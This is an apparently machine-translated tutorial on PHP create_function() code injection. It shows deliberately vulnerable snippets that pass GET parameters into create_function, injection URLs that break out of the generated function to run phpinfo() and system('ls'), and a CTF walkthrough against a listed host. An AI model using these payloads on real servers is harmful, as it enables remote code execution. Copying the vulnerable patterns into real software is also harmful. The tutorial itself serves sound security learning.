create_function () code injection

() Function Introduction 00x00create_function

PHP 4> = 4.0.1Scope: PHP 5, ,PHP 7

Function: Create anonymous function according to the parameters passed, and returns its unique name.

grammar:

create_function ( String  $ args , String  $ code )
 // function declaration variables string $ args portions 
methods // string $ code executed by code portions

0x01 Functions to Analyze

Case

<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc\n";
echo $newfunc(2, M_E) . "\n";
?>

create_function()Creates an anonymous function ( lambdastyle)

create_function () function is executed within the eval () , we found the back of the implementation of returnthe statement, which belongs to create_function()the second argument in string $codeposition.

Thus create_function function is equivalent to

<?php
function lambda1($a,$b){
    return "ln($a) + ln($b) = " . log($a * $b);
}
?>

0x03 implementation code injection case

Case number one:

<?php
error_reporting(0);
$sort_by = $_GET['sort_by'];
$sorter = 'strnatcasecmp';
$databases=array('1234','4321');
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
usort($databases, create_function('$a, $b', $sort_function));
?>

payloadConstruction:

http://localhost/test/1.php?sort_by='"]);}phpinfo();/*

The actual reduction process in combination:

$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by '"]);}phpinfo();/*

The actual implementation of the anonymous function:

function niming($a,$b){
return 1 * ' . $sorter . '($a["' . $sort_by '"]);
}
phpinfo();/* }

Case 2:

<?php
$c=$_GET['c'];
$lambda=create_function('$a,$b',"return (strlen($a)-strlen($b)+" . "strlen($c));");
$array=array('reall long string here,boy','this','midding lenth','larget');
usort($array,$lambda);
print_r($array);
?>

payloadConstruction:

http://localhost/test/2.php?c=1));}phpinfo();/*

The actual reduction process in combination:

$lambda=create_function('$a,$b',"return (strlen($a)-strlen($b)+" . "strlen(1));}phpinfo();/*));");

The actual implementation of the anonymous function:

 function ft($a,$b){
    return (strlen($a)-strlen($b)+" . "strlen(1));}phpinfo();/*));
 }

There is a 0x04 create_function code injection of CTF

 

 Address: http://198.13.45.199:5007/

Two links, click on "do not point I" link to jump to a page with php source http://198.13.45.199:5007/index.php?source

 

 See create_function function, there should be injected

GET request, just pass a code value, and ";" can be closed should the payload successfully constructed

Construction payload:

http://198.13.45.199:5007/index.php?code=1;}phpinfo();/*

 

 Successful code execution

A system () function command to perform system operations

Construction payload:

http://198.13.45.199:5007/index.php?code=1;}system(%27ls%20../../../%27);/*

Ls directory with straight turn, turn until the name of the file containing the flag, and then open the cat will get flag:

 

 

From the PHP 7.2.0start, create_function()it is discarded

 

Guess you like

Origin www.cnblogs.com/-chenxs/p/11459374.html